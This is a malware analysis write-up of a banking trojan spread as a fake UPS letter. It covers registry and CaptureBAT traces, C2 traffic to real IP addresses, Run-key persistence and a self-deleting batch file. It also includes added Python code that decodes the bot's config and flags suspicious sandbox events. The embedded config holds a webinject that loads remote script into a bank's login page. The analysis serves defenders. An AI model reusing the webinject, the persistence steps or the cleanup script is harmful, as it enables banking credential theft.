HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\19\Shell\ItemPos1280x1024(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 DC 00 00 00 AA 00 00 00 40 00 31 00 00 00 00 00 FE 40 47 65 10 00 61 70 61 74 65 44 4E 53 00 00 28 00 03 00 04 00 EF BE FE 40 47 65 FF 40 AB 39 14 00 00 00 61 00 70 00 61 00 74 00 65 00 44 00 4E 00 53 00 00 00 18 00 DC 00 00 00 02 00 00 00 52 00 31 00 00 00 00 00 FE 40 73 46 10 00 44 45 50 45 4E 44 7E 31 00 00 3A 00 03 00 04 00 EF BE FE 40 73 46 FF 40 AD 39 14 00 00 00 44 00 65 00 70 00 65 00 6E 00 64 00 65 00 6E 00 63 00 79 00 20 00 57 00 61 00 6C 00 6B 00 65 00 72 00 00 00 18 00 DC 00 00 00 E2 00 00 00 2E 00 31 00 00 00 00 00 FE 40 95 65 10 00 6E 63 00 00 1C 00 03 00 04 00 EF BE FE 40 95 65 FE 40 9A 65 14 00 00 00 6E 00 63 00 00 00 12 00 02 00 00 00 02 00 00 00 3C 00 31 00 00 00 00 00 FB 40 A8 69 10 00 6F 64 62 67 31 31 30 00 26 00 03 00 04 00 EF BE FB 40 A8 69 FE 40 E3 59 14 00 00 00 6F 00 64 00 62 00 67 00 31 00 31 00 30 00 00 00 16 00 02 00 00 00 3A 00 00 00 58 00 31 00 00 00 00 00 FE 40 A3 44 10 00 50 45 49 44 2D 30 7E 31 2E 39 35 2D 00 00 3C 00 03 00 04 00 EF BE FE 40 A3 44 FE 40 E3 59 14 00 00 00 50 00 45 00 69 00 44 00 2D 00 30 00 2E 00 39 00 35 00 2D 00 32 00 30 00 30 00 38 00 31 00 31 00 30 00 33 00 00 00 1C 00 02 00 00 00 1A 01 00 00 4E 00 31 00 00 00 00 00 FE 40 C6 64 10 00 50 52 4F 43 45 53 7E 32 00 00 36 00 03 00 04 00 EF BE FE 40 C6 64 FF 40 B0 39 14 00 00 00 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 45 00 78 00 70 00 6C 00 6F 00 72 00 65 00 72 00 00 00 18 00 DC 00 00 00 72 00 00 00 4C 00 31 00 00 00 00 00 FE 40 93 64 10 00 50 52 4F 43 45 53 7E 31 00 00 34 00 03 00 04 00 EF BE FE 40 93 64 FF 40 B3 39 14 00 00 00 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 4D 00 6F 00 6E 00 69 00 74 00 6F 00 72 00 00 00 18 00 02 00 00 00 E2 00 00 00 3C 00 31 00 00 00 00 00 FE 40 15 65 10 00 52 65 67 53 68 6F 74 00 26 00 03 00 04 00 EF BE FE 40 15 65 FE 40 20 65 14 00 00 00 52 00 65 00 67 00 53 00 68 00 
6F 00 74 00 00 00 16 00 02 00 00 00 72 00 00 00 4A 00 31 00 00 00 00 00 FE 40 2B 45 10 00 53 4E 49 50 50 49 7E 31 00 00 32 00 03 00 04 00 EF BE FE 40 24 45 FE 40 40 52 14 00 00 00 53 00 6E 00 69 00 70 00 70 00 69 00 6E 00 67 00 54 00 6F 00 6F 00 6C 00 73 00 00 00 18 00 DC 00 00 00 3A 00 00 00 46 00 32 00 00 08 01 00 A9 3E 20 39 20 00 50 45 76 69 65 77 2E 65 78 65 00 00 2C 00 03 00 04 00 EF BE FE 40 05 5A FF 40 AB 39 14 00 00 00 50 00 45 00 76 00 69 00 65 00 77 00 2E 00 65 00 78 00 65 00 00 00 1A 00 02 00 00 00 AA 00 00 00 6E 00 32 00 E6 02 00 00 FE 40 CF 5C 20 00 53 48 4F 52 54 43 7E 31 2E 4C 4E 4B 00 00 52 00 03 00 04 00 EF BE FE 40 CF 5C FE 40 9C 65 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 52 00 65 00 73 00 48 00 61 00 63 00 6B 00 65 00 72 00 2E 00 65 00 78 00 65 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 DC 00 00 00 1A 01 00 00 4E 00 32 00 D1 05 00 00 FE 40 8D 65 20 00 57 49 52 45 53 48 7E 31 2E 4C 4E 4B 00 00 32 00 03 00 04 00 EF BE FE 40 8D 65 FF 40 AC 39 14 00 00 00 57 00 69 00 72 00 65 00 73 00 68 00 61 00 72 00 6B 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 DC 00 00 00 1A 01 00 00 00 00 00 00
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\19\Shell\ItemPos1280x1024(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 DC 00 00 00 AA 00 00 00 40 00 31 00 00 00 00 00 FE 40 47 65 10 00 61 70 61 74 65 44 4E 53 00 00 28 00 03 00 04 00 EF BE FE 40 47 65 FF 40 AB 39 14 00 00 00 61 00 70 00 61 00 74 00 65 00 44 00 4E 00 53 00 00 00 18 00 DC 00 00 00 02 00 00 00 52 00 31 00 00 00 00 00 FE 40 73 46 10 00 44 45 50 45 4E 44 7E 31 00 00 3A 00 03 00 04 00 EF BE FE 40 73 46 FF 40 AD 39 14 00 00 00 44 00 65 00 70 00 65 00 6E 00 64 00 65 00 6E 00 63 00 79 00 20 00 57 00 61 00 6C 00 6B 00 65 00 72 00 00 00 18 00 DC 00 00 00 E2 00 00 00 2E 00 31 00 00 00 00 00 FE 40 95 65 10 00 6E 63 00 00 1C 00 03 00 04 00 EF BE FE 40 95 65 FE 40 9A 65 14 00 00 00 6E 00 63 00 00 00 12 00 02 00 00 00 02 00 00 00 3C 00 31 00 00 00 00 00 FB 40 A8 69 10 00 6F 64 62 67 31 31 30 00 26 00 03 00 04 00 EF BE FB 40 A8 69 FE 40 E3 59 14 00 00 00 6F 00 64 00 62 00 67 00 31 00 31 00 30 00 00 00 16 00 02 00 00 00 3A 00 00 00 58 00 31 00 00 00 00 00 FE 40 A3 44 10 00 50 45 49 44 2D 30 7E 31 2E 39 35 2D 00 00 3C 00 03 00 04 00 EF BE FE 40 A3 44 FE 40 E3 59 14 00 00 00 50 00 45 00 69 00 44 00 2D 00 30 00 2E 00 39 00 35 00 2D 00 32 00 30 00 30 00 38 00 31 00 31 00 30 00 33 00 00 00 1C 00 02 00 00 00 1A 01 00 00 4E 00 31 00 00 00 00 00 FE 40 C6 64 10 00 50 52 4F 43 45 53 7E 32 00 00 36 00 03 00 04 00 EF BE FE 40 C6 64 FF 40 B0 39 14 00 00 00 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 45 00 78 00 70 00 6C 00 6F 00 72 00 65 00 72 00 00 00 18 00 DC 00 00 00 72 00 00 00 4C 00 31 00 00 00 00 00 FE 40 93 64 10 00 50 52 4F 43 45 53 7E 31 00 00 34 00 03 00 04 00 EF BE FE 40 93 64 FF 40 B3 39 14 00 00 00 50 00 72 00 6F 00 63 00 65 00 73 00 73 00 4D 00 6F 00 6E 00 69 00 74 00 6F 00 72 00 00 00 18 00 02 00 00 00 E2 00 00 00 3C 00 31 00 00 00 00 00 FE 40 15 65 10 00 52 65 67 53 68 6F 74 00 26 00 03 00 04 00 EF BE FE 40 15 65 FF 40 B8 39 14 00 00 00 52 00 65 00 67 00 53 00 68 00 
6F 00 74 00 00 00 16 00 02 00 00 00 72 00 00 00 4A 00 31 00 00 00 00 00 FE 40 2B 45 10 00 53 4E 49 50 50 49 7E 31 00 00 32 00 03 00 04 00 EF BE FE 40 24 45 FE 40 40 52 14 00 00 00 53 00 6E 00 69 00 70 00 70 00 69 00 6E 00 67 00 54 00 6F 00 6F 00 6C 00 73 00 00 00 18 00 DC 00 00 00 3A 00 00 00 46 00 32 00 00 08 01 00 A9 3E 20 39 20 00 50 45 76 69 65 77 2E 65 78 65 00 00 2C 00 03 00 04 00 EF BE FE 40 05 5A FF 40 AB 39 14 00 00 00 50 00 45 00 76 00 69 00 65 00 77 00 2E 00 65 00 78 00 65 00 00 00 1A 00 02 00 00 00 AA 00 00 00 6E 00 32 00 E6 02 00 00 FE 40 CF 5C 20 00 53 48 4F 52 54 43 7E 31 2E 4C 4E 4B 00 00 52 00 03 00 04 00 EF BE FE 40 CF 5C FE 40 9C 65 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 52 00 65 00 73 00 48 00 61 00 63 00 6B 00 65 00 72 00 2E 00 65 00 78 00 65 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 DC 00 00 00 1A 01 00 00 4E 00 32 00 D1 05 00 00 FE 40 8D 65 20 00 57 49 52 45 53 48 7E 31 2E 4C 4E 4B 00 00 32 00 03 00 04 00 EF BE FE 40 8D 65 FF 40 AC 39 14 00 00 00 57 00 69 00 72 00 65 00 73 00 68 00 61 00 72 00 6B 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 DC 00 00 00 1A 01 00 00 00 00 00 00
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).left: 0x00000123
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).left: 0x0000007F
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).top: 0x00000092
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).top: 0x0000016D
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).right: 0x00000443
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).right: 0x0000039F
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).bottom: 0x000002EA
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\WinPos1280x1024(1).bottom: 0x000003C5
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\ItemPos1280x1024(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 DC 00 00 00 AA 00 00 00 2E 00 31 00 00 10 00 00 FE 40 2E 5E 10 00 72 77 00 00 1C 00 03 00 04 00 EF BE FE 40 2E 5E FE 40 2A 5E 14 00 00 00 72 00 77 00 00 00 12 00 02 00 00 00 02 00 00 00 40 00 32 00 01 1A 00 00 F9 40 C9 40 80 00 61 67 65 6E 74 2E 70 79 00 00 28 00 03 00 04 00 EF BE F9 40 C9 40 F9 40 C9 40 14 00 00 00 61 00 67 00 65 00 6E 00 74 00 2E 00 70 00 79 00 00 00 18 00 DC 00 00 00 02 00 00 00 52 00 32 00 00 A6 00 00 FB 40 30 40 80 00 42 42 42 20 72 65 70 6F 72 74 2E 65 78 65 00 00 34 00 03 00 04 00 EF BE FE 40 29 5E FB 40 30 40 14 00 00 00 42 00 42 00 42 00 20 00 72 00 65 00 70 00 6F 00 72 00 74 00 2E 00 65 00 78 00 65 00 00 00 1E 00 02 00 00 00 3A 00 00 00 58 00 32 00 00 B4 01 00 FB 40 B5 3D 80 00 44 48 4C 2D 53 68 69 70 70 69 6E 67 2E 65 78 65 00 00 38 00 03 00 04 00 EF BE FE 40 29 5E FB 40 B5 3D 14 00 00 00 44 00 48 00 4C 00 2D 00 53 00 68 00 69 00 70 00 70 00 69 00 6E 00 67 00 2E 00 65 00 78 00 65 00 00 00 20 00 DC 00 00 00 3A 00 00 00 42 00 32 00 B4 21 1A 03 FE 40 50 5E 80 00 64 75 6D 70 2E 70 63 61 70 00 2A 00 03 00 04 00 EF BE FE 40 50 5E F7 40 01 71 14 00 00 00 64 00 75 00 6D 00 70 00 2E 00 70 00 63 00 61 00 70 00 00 00 18 00 02 00 00 00 72 00 00 00 40 00 32 00 00 4E 01 00 FE 40 D4 44 80 00 64 75 71 75 2E 65 78 65 00 00 28 00 03 00 04 00 EF BE FE 40 29 5E FE 40 D4 44 14 00 00 00 64 00 75 00 71 00 75 00 2E 00 65 00 78 00 65 00 00 00 18 00 DC 00 00 00 72 00 00 00 A2 00 32 00 00 E0 00 00 FB 40 E6 69 80 00 50 6F 73 74 65 74 69 6B 65 74 74 5F 44 65 75 74 73 63 68 65 5F 50 6F 73 74 5F 41 47 5F 44 45 34 38 32 34 35 36 2E 65 78 65 00 6A 00 03 00 04 00 EF BE FE 40 DC 5C FB 40 E6 69 14 00 00 00 50 00 6F 00 73 00 74 00 65 00 74 00 69 00 6B 00 65 00 74 00 74 00 5F 00 44 00 65 00 75 00 74 00 73 00 63 00 68 00 65 00 5F 00 50 00 6F 00 73 00 74 00 5F 00 41 00 47 00 5F 00 44 00 45 00 34 00 38 00 32 00 
34 00 35 00 36 00 2E 00 65 00 78 00 65 00 00 00 38 00 02 00 00 00 AA 00 00 00 A2 00 32 00 50 00 00 00 FB 40 82 6A 80 00 50 6F 73 74 65 74 69 6B 65 74 74 5F 44 65 75 74 73 63 68 65 5F 50 6F 73 74 5F 41 47 5F 44 45 34 38 32 34 35 36 2E 74 78 74 00 6A 00 03 00 04 00 EF BE FB 40 82 6A FB 40 82 6A 14 00 00 00 50 00 6F 00 73 00 74 00 65 00 74 00 69 00 6B 00 65 00 74 00 74 00 5F 00 44 00 65 00 75 00 74 00 73 00 63 00 68 00 65 00 5F 00 50 00 6F 00 73 00 74 00 5F 00 41 00 47 00 5F 00 44 00 45 00 34 00 38 00 32 00 34 00 35 00 36 00 2E 00 74 00 78 00 74 00 00 00 38 00 02 00 00 00 AA 00 00 00 00 00 00 00
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\21\Shell\ItemPos1280x1024(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 52 00 32 00 00 A6 00 00 FE 40 A2 6B 80 00 42 42 42 20 72 65 70 6F 72 74 2E 65 78 65 00 00 34 00 03 00 04 00 EF BE FE 40 A2 6B FE 40 A2 6B 14 00 00 00 42 00 42 00 42 00 20 00 72 00 65 00 70 00 6F 00 72 00 74 00 2E 00 65 00 78 00 65 00 00 00 1E 00 DC 00 00 00 02 00 00 00 58 00 32 00 00 B4 01 00 FE 40 9B 6B 80 00 44 48 4C 2D 53 68 69 70 70 69 6E 67 2E 65 78 65 00 00 38 00 03 00 04 00 EF BE FE 40 9B 6B FE 40 9B 6B 14 00 00 00 44 00 48 00 4C 00 2D 00 53 00 68 00 69 00 70 00 70 00 69 00 6E 00 67 00 2E 00 65 00 78 00 65 00 00 00 20 00 DC 00 00 00 3A 00 00 00 54 00 32 00 9C 60 0A 00 FC 40 65 8F 80 00 64 75 71 75 2E 30 78 35 30 39 38 2E 69 64 62 00 36 00 03 00 04 00 EF BE FC 40 65 8F FC 40 65 8F 14 00 00 00 64 00 75 00 71 00 75 00 2E 00 30 00 78 00 35 00 30 00 39 00 38 00 2E 00 69 00 64 00 62 00 00 00 1E 00 02 00 00 00 3A 00 00 00 40 00 32 00 00 4E 01 00 FE 40 8C 69 80 00 64 75 71 75 2E 65 78 65 00 00 28 00 03 00 04 00 EF BE FE 40 8C 69 FE 40 8C 69 14 00 00 00 64 00 75 00 71 00 75 00 2E 00 65 00 78 00 65 00 00 00 18 00 02 00 00 00 72 00 00 00 8A 00 32 00 00 3C 01 00 FE 40 18 72 80 00 55 50 53 5F 43 4F 4C 4C 45 43 54 5F 4C 45 54 54 45 52 5F 4E 38 38 32 33 34 32 35 34 35 2E 65 78 65 00 5A 00 03 00 04 00 EF BE FE 40 18 72 FE 40 18 72 14 00 00 00 55 00 50 00 53 00 5F 00 43 00 4F 00 4C 00 4C 00 45 00 43 00 54 00 5F 00 4C 00 45 00 54 00 54 00 45 00 52 00 5F 00 4E 00 38 00 38 00 32 00 33 00 34 00 32 00 35 00 34 00 35 00 2E 00 65 00 78 00 65 00 00 00 30 00 02 00 00 00 72 00 00 00 00 00 00 00
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).left: 0x00000008
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).left: 0x0000007F
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).top: 0x00000108
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).top: 0x0000016D
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).right: 0x00000328
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).right: 0x0000039F
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).bottom: 0x00000360
HKU\S-1-5-21-57989841-152049171-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\22\Shell\WinPos1280x1024(1).bottom: 0x000003C5
----------------------------------
Total changes:28
----------------------------------
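To make the S125D0261 value readable, an added example (not from the original post) that turns RegShot's hex representation back into bytes and summarises the XML inside it. Only the first 16 octets are copied from the dump above; the XML fed to the parser is a constructed, abridged version of the decoded value (the same element names, the real postbank.de condition and tranzasecure.com script URL, but only a subset of the formgrabber rules and one of the two httpinjects). The 40-digit hash attribute is consistent with the SHA hit from KANAL, nothing more is claimed about it, and the first-match semantics in grabbed() are an assumption drawn from the rule order (allow the login page, deny the rest of the domain, allow everything else).

```python
"""Decode a RegShot hex dump of the bot's config value and summarise the XML."""
import re
import xml.etree.ElementTree as ET

# Opening octets of the S125D0261 value exactly as RegShot printed them on this page
REGSHOT_HEX_PREFIX = "3C 73 65 74 74 69 6E 67 73 20 68 61 73 68 3D 22"

# Constructed, abridged stand-in for the full decoded value (see lead-in).
CONFIG_XML = r"""<settings hash="e57fd8ef5e9336440689174555a321bc76855eb1"><httpshots><url type="deny" onget="1" onpost="1">\.(gif|png|jpg|css|swf|ico|js)($|\?)</url></httpshots><formgrabber><url type="allow">accounts.google.com/ServiceLogin/</url><url type="deny">google\.com</url><url type="deny">facebook\.com</url><url type="allow">.*</url></formgrabber><bconnect>31.184.192.195:8080</bconnect><httpinjects><httpinject><conditions><url type="allow" onpost="1" onget="1">.*banking.postbank.de/rai/logi.*</url></conditions><actions><modify><pattern><![CDATA[([\x00]*?)</head>]]></pattern><replacement><![CDATA[<script>document.write('<script src="https://tranzasecure.com/resources/script/get.php/denew/?name=de_postbank_login4.js"></scr'+'ipt>');</script>]]></replacement></modify></actions></httpinject></httpinjects></settings>"""


def regshot_hex_to_bytes(dump: str) -> bytes:
    """RegShot prints REG_BINARY values as space separated octets; ignore anything else."""
    return bytes(int(tok, 16) for tok in re.findall(r"\b[0-9A-Fa-f]{2}\b", dump))


def summarise(xml_text: str) -> dict:
    """Pull out what an analyst wants first: hash, back-connect server, form grabber
    rules, and for every inject the targeted URL regexes and remote scripts."""
    root = ET.fromstring(xml_text)
    info = {
        "hash": root.get("hash"),
        "backconnect": (root.findtext("bconnect") or "").strip(),
        "formgrabber": [(u.get("type"), u.text) for u in root.findall("formgrabber/url")],
        "injects": [],
    }
    for inj in root.findall("httpinjects/httpinject"):
        targets = [u.text for u in inj.findall("conditions/url")]
        replacement = inj.findtext("actions/modify/replacement") or ""
        # external scripts the injected HTML pulls in: hosts to block and hunt for
        remote = re.findall(r'src="(https?://[^"]+)"', replacement)
        info["injects"].append({"targets": targets, "remote_scripts": remote})
    return info


def grabbed(url: str, rules) -> bool:
    """Would the form grabber log a POST to this URL? Assumes first matching rule wins."""
    for kind, pattern in rules:
        if re.search(pattern, url):
            return kind == "allow"
    return False


if __name__ == "__main__":
    print(regshot_hex_to_bytes(REGSHOT_HEX_PREFIX))
    cfg = summarise(CONFIG_XML)
    print(cfg["backconnect"], cfg["injects"])
    for u in ("https://accounts.google.com/ServiceLogin/x", "https://mail.google.com/", "https://shop.example/login"):
        print(u, grabbed(u, cfg["formgrabber"]))
```

Feed the whole hex blob from RegShot (key name included, it is filtered out) to regshot_hex_to_bytes() and pass the result to summarise(); ElementTree keeps the CDATA bodies as plain text, which is where the injected script lives.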
CaptureBAT revealed additional useful information:
"06/8/2012 14:11:8.612","registry","SetValueKey","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData"
Writing the cached Shell Folders\AppData value is a side effect of the sample resolving its %APPDATA% path through the shell API, not a browser setting; it tells us where the copy is about to be written.
"06/8/2012 14:11:8.612","registry","SetValueKey","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB00925890.exe"
Malware copy is added to autostart
"06/8/2012 14:11:10.915","registry","SetValueKey","C:\Documents and Settings\xxx\Application Data\KB00925890.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData"
The same folder lookup again, this time performed by the copy running from Application Data (KB00925890.exe), about two seconds after the original wrote the Run value.
Attempt to connect to port 8080 on 78.46.64.17 (Hetzner, Germany). The host is unreachable, so no TCP connection is established.
It then successfully connects to 84.53.217.109 on port 8080 and requests http://84.53.217.109:8080/mx5/C/in/. The IP address is located in Russia:
inetnum: 84.53.217.104 - 84.53.217.111
netname: RT-VLD-INFRA
remarks: INFRA-AW
descr: VladimirbranchRT Limited
country: RU
The server is nginx 1.0.10 on Debian Squeeze with PHP 5.3.3-7 (from the Server and X-Powered-By headers of the response below).
The first query is a POST with a hard-coded User-Agent (it claims MSIE 7.0 on Windows NT 6.0, although the sandbox runs XP SP3):
POST /mx5/C/in/ HTTP/1.1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
Host: 84.53.217.109:8080
Content-Length: 348
Connection: Keep-Alive
Cache-Control: no-cache
The POST sends 348 bytes of raw data starting with 0xdeadbeef. Note that the little-endian dword right after the magic, 0x0000015c = 348, equals the Content-Length:
% xxd post.raw | head
0000000: dead beef 5c01 0000 0100 0000 72e2 a30a ....\.......r...
0000010: a9b3 9ef8 31a8 bc24 907e 5029 bf8d cabf ....1..$.~P)....
0000020: 6db3 c551 8c13 fb2c fe02 b052 d708 7a86 m..Q...,...R..z.
0000030: 4abf 88a0 3949 9561 25f0 1d3d 4f3b 814a J...9I.a%..=O;.J
0000040: 0f2d 92e7 1ac6 56ac da53 5627 b133 452b .-....V..SV'.3E+
0000050: b545 0baa 9457 d3fe 96d3 76e3 919e afe4 .E...W....v.....
0000060: 9030 bfae 7bae cf66 1b67 4473 aac1 5584 .0..{..f.gDs..U.
0000070: 4726 1bb4 f69c 8a3c bfbe 2803 5dd0 76d3 G&.....<..(.].v.
0000080: 0d15 5057 8389 d338 ab58 e43f 3dec ac2c ..PW...8.X.?=..,
0000090: b62b 98dc 89eb a8a0 5203 5ff3 785b 308e .+......R._.x[0.
The server answers 200 OK:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Tue, 31 Jul 2012 07:17:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2503
X-Powered-By: PHP/5.3.3-7+squeeze13
Vary: Accept-Encoding
The 2503-byte body is again binary data starting with 0xdeadbeef, and again the dword after the magic (0x000009c7 = 2503) equals the Content-Length. A dump of this response is shown further below, in the copy that explorer.exe writes to the IE cache.
I used CaptureBAT in order to record all activity in terms of network, file system and registry. It also saved the temporary batch file created by the malware.
"06/8/2012 14:11:9.924","file","Write","C:\WINDOWS\system32\cmd.exe","C:\Program Files\Capture\logs\deleted_files\C\Documents and Settings\xxx\Local Settings\Temp\exp1.tmp.bat"
"06/8/2012 14:11:9.924","file","Delete","C:\WINDOWS\system32\cmd.exe","C:\Documents and Settings\xxx\Local Settings\Temp\exp1.tmp.bat"
Its purpose is to delete the original dropper, retrying in the :R loop until the file is gone (the first del fails while the parent process still has the file open), and then to delete itself:
% cat exp1.tmp.bat
@echo off
:R
del /F /Q /A "C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe"
if exist "C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe" goto R
del /F /Q /A "C:\DOCUME~1\XXX~1\LOCALS~1\Temp\exp1.tmp.bat"
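The CaptureBAT events above (the Run-key write, the Shell Folders lookups, the batch file written to Temp and deleted a moment later, and explorer.exe populating the IE cache) are the kind of pattern worth flagging automatically when triaging a sandbox run. The following is an added example, not code from the original post or from CaptureBAT: it parses CaptureBAT's quoted-CSV log lines and raises a finding for Run-key persistence, for a script written to Temp and then deleted (matched by file name, because CaptureBAT logs the write under its own deleted_files copy), and for a non-browser process writing into Content.IE5. The sample log is constructed from the lines quoted on this page plus one benign notepad line for contrast.

```python
import csv
import io
import ntpath
from collections import defaultdict

# Constructed sample: the CaptureBAT lines quoted on this page, plus a benign line for contrast.
SAMPLE_LOG = r'''"06/8/2012 14:11:8.612","registry","SetValueKey","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData"
"06/8/2012 14:11:8.612","registry","SetValueKey","C:\Documents and Settings\xxx\Desktop\mw\UPS_COLLECT_LETTER_N882342545.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KB00925890.exe"
"06/8/2012 14:11:9.924","file","Write","C:\WINDOWS\system32\cmd.exe","C:\Program Files\Capture\logs\deleted_files\C\Documents and Settings\xxx\Local Settings\Temp\exp1.tmp.bat"
"06/8/2012 14:11:9.924","file","Delete","C:\WINDOWS\system32\cmd.exe","C:\Documents and Settings\xxx\Local Settings\Temp\exp1.tmp.bat"
"06/8/2012 14:11:10.915","registry","SetValueKey","C:\Documents and Settings\xxx\Application Data\KB00925890.exe","HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\AppData"
"06/8/2012 14:11:32.226","file","Write","C:\WINDOWS\explorer.exe","C:\Documents and Settings\xxx\Local Settings\Temporary Internet Files\Content.IE5\A65EQAIB\in[1].htm"
"06/8/2012 14:11:40.000","file","Write","C:\WINDOWS\system32\notepad.exe","C:\Documents and Settings\xxx\My Documents\notes.txt"
'''

RUN_KEYS = ("\\currentversion\\run\\", "\\currentversion\\runonce\\")
SCRIPT_EXT = (".bat", ".cmd", ".vbs", ".js")
BROWSERS = ("iexplore.exe",)

def parse_capturebat(text):
    """Yield (timestamp, kind, operation, process, target) from CaptureBAT's quoted-CSV log."""
    for row in csv.reader(io.StringIO(text)):
        if len(row) >= 5:
            yield tuple(row[:5])

def triage(text):
    """Return (rule, process, target) findings for the behaviours seen in this analysis."""
    findings = []
    writes = defaultdict(list)  # file name -> [(process, path)] seen in Write events
    for _ts, kind, op, proc, target in parse_capturebat(text):
        low = target.lower()
        name = ntpath.basename(low)
        if kind == "registry" and op == "SetValueKey" and any(k in low for k in RUN_KEYS):
            findings.append(("run-key persistence", proc, target))
        elif kind == "file" and op == "Write":
            writes[name].append((proc, target))
            # WinINet cache written by something that is not a browser: HTTP from an unexpected host process
            if "\\content.ie5\\" in low and ntpath.basename(proc.lower()) not in BROWSERS:
                findings.append(("non-browser process writes WinINet cache", proc, target))
        elif kind == "file" and op == "Delete":
            # a script that lived in Temp only between a Write and a Delete: transient helper
            if name.endswith(SCRIPT_EXT) and "\\temp\\" in low and name in writes:
                findings.append(("transient script in Temp (written then deleted)", proc, target))
    return findings

if __name__ == "__main__":
    for rule, proc, target in triage(SAMPLE_LOG):
        print("%-48s %-14s %s" % (rule, ntpath.basename(proc), target))
```

The Temp-script rule deliberately keys on the file name rather than the full path, since CaptureBAT records the Write under C:\Program Files\Capture\logs\deleted_files\... (its preserved copy) and the Delete under the original path.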
Notably, it is explorer.exe, not the malware process, that writes the response body into the IE cache (Content.IE5\...\in[1].htm is the WinINet cache naming scheme) and deletes it again. The HTTP request to the C&C is therefore issued from inside explorer.exe, consistent with code having been injected into that process (see the malfind output below):
"06/8/2012 14:11:32.226","file","Write", "C:\WINDOWS\explorer.exe","C:\Documents and Settings\xxx\Local Settings\Temporary Internet Files\Content.IE5\A65EQAIB\in[1].htm"
"06/8/2012 14:11:32.226","file","Delete","C:\WINDOWS\explorer.exe","C:\Documents and Settings\xxx\Local Settings\Temporary Internet Files\Content.IE5\A65EQAIB\in[1].htm"
% xxd in\[1\].htm | head
0000000: dead beef c709 0000 0100 0000 c47a b3ba .............z..
0000010: 1cbd 0669 ee22 007e 9907 9e04 7002 3749 ...i.".~....p.7I
0000020: 716c afae 7df1 27bf c8da 71e5 8b25 07d5 ql..}.'...q..%..
0000030: 6528 cf97 ee1c b7da 7191 6d69 b346 3e58 e(......q.mi.F>X
0000040: 18c1 3742 7495 f5bc bdbb 21db fd11 c447 ..7Bt.....!....G
0000050: bcb2 d109 1750 efb0 318b 356d ffcd 9d31 .....P..1.5m...1
0000060: 3e91 2b27 e548 5255 1144 8db9 40b9 e243 >.+'.HRU.D..@..C
0000070: f58b dfbf 9d20 2365 fe63 472d d93e d8f4 ..... #e.cG-.>..
